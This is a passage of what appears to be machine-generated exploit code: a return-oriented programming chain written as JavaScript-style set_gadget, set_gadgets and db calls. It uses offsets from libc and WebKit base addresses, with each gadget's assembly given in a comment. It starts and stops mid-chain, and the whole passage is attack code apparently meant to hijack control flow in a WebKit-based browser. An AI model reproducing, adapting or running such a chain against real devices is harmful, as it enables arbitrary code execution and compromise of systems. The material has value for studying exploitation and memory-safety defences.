rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L8896: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+421488, //L8898 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+421504, //L8899 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+421472, //L8897 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8897: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8898: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8899: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, 
edi libc_base+764760, //pop rsi ropchain+421584, //L8900 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+421600, //L8901 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8900: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8901: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+421696, //L8903 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+421680, //L8902 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8902: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8903: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+421776, //L8904 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8904: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8905: db([88, 0]); // 0x58 set_gadget(libc_base+144605,); //pop rdi //L8906: db([88, 0]); // 0x58 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+421920, //L8907 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+421952, //L8909 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+421936, //L8908 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8907: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8908: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8909: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); 
db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+422120, //L8911 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+422136, //L8912 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+422104, //L8910 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8910: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8911: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8912: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+422248, //L8914 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+422296, //L8917 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+422264, //L8915 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8914: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8915: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8916: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8917: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+422408, //L8918+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+422400, //L8918 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L8918: db([0, 0]); // 0x0 set_gadgets([ ropchain+422424, //L8918+24 ropchain+423416, //L8913 libc_base+764760, //pop rsi 
ropchain+422464, //L8919 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8919: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8921: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+422584, //L8924 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+422568, //L8922 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8922: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8924: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+422760, //L8927 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+422776, //L8928 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+422728, //L8925 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+422744, //L8926 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8925: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8926: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8927: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8928: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+422872, //L8930 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+422856, //L8929 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8929: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8930: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 
0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L8931: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L8932: db([5, 0]); // 0x5 set_gadget(libc_base+763368,); //pop rcx //L8933: db([5, 0]); // 0x5 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+423072, //L8935 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8935: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+423128, //L8936 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8936: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+423264, //L8940 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+423248, //L8939 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8938: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L8939: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8940: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+423328, //L8941 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8941: db([0, 0]); // 0x0 
set_gadget(libc_base+764760,); //pop rsi //L8943: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+423408, //L8944 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8944: db([0, 0]); // 0x0 //L8913: set_gadgets([ libc_base+764760, //pop rsi ropchain+423456, //L8946 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L8946: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8948: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+423576, //L8951 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+423560, //L8949 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L8949: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8951: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+423656, //L8952 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+423672, //L8953 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8952: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8953: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+423832, //L8957 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+423800, //L8955 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+423816, //L8956 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8954: db([24, 0]); // 0x18 
set_gadget(webkit_base+3236123,); //pop r9 //L8955: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8956: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8957: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+423888, //L8959 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L8959: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+424016, //L8961 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+424032, //L8962 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+424000, //L8960 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8960: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8961: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8962: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+424192, //L8966 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+424160, //L8964 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+424176, //L8965 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8963: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L8964: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8965: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8966: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+424248, //L8968 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L8968: db([0, 
0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+424376, //L8970 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+424392, //L8971 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+424360, //L8969 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8969: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8970: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8971: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+424552, //L8975 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+424520, //L8973 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+424536, //L8974 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L8972: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L8973: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8974: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8975: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+424608, //L8977 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L8977: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+424736, //L8979 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+424752, //L8980 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+424720, //L8978 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+763368 //pop rcx ]); //L8978: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8979: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8980: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+424832, //L8981 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+424848, //L8982 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8981: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8982: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+424944, //L8984 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+424928, //L8983 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8983: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8984: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+425024, //L8985 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8985: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8986: db([105, 0]); // 0x69 set_gadget(libc_base+144605,); //pop rdi //L8987: db([105, 0]); // 0x69 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+425168, //L8988 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+425200, //L8990 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+425184, //L8989 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop 
rcx ]); //L8988: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8989: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8990: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+425376, //L8992 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+425392, //L8993 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+425360, //L8991 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L8991: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8992: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8993: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+425552, //L8998 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+425568, //L8999 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+425504, //L8995 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L8995: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L8996: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L8997: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L8998: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L8999: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+425680, //L9000+8 
libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+425672, //L9000 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L9000: db([0, 0]); // 0x0 set_gadgets([ ropchain+425696, //L9000+24 ropchain+427912, //L8994 libc_base+764760, //pop rsi ropchain+425736, //L9001 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9001: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9003: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+425856, //L9006 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+425840, //L9004 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9004: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9006: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+425936, //L9007 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+425952, //L9008 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9007: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9008: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+426112, //L9012 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+426080, //L9010 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+426096, //L9011 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9009: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L9010: db([0, 
0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9011: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9012: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+426168, //L9014 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L9014: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+426296, //L9016 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+426312, //L9017 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+426280, //L9015 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9015: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9016: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9017: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+426472, //L9021 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+426440, //L9019 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+426456, //L9020 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9018: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L9019: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9020: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9021: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+426528, //L9023 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L9023: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl 
libc_base+764760, //pop rsi ropchain+426656, //L9025 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+426672, //L9026 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+426640, //L9024 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9024: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9025: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9026: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+426832, //L9030 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+426800, //L9028 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+426816, //L9029 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9027: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L9028: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9029: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9030: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+426888, //L9032 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L9032: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+427016, //L9034 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+427032, //L9035 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+427000, //L9033 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9033: db([0, 0]); // 0x0 
set_gadget(webkit_base+3236123,); //pop r9 //L9034: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9035: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+427112, //L9036 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+427128, //L9037 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9036: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9037: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+427224, //L9039 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+427208, //L9038 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9038: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9039: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+427304, //L9040 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9040: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9041: db([100, 0]); // 0x64 set_gadget(libc_base+144605,); //pop rdi //L9042: db([100, 0]); // 0x64 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+427448, //L9043 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+427480, //L9045 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+427464, //L9044 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9043: db([0, 0]); // 0x0 
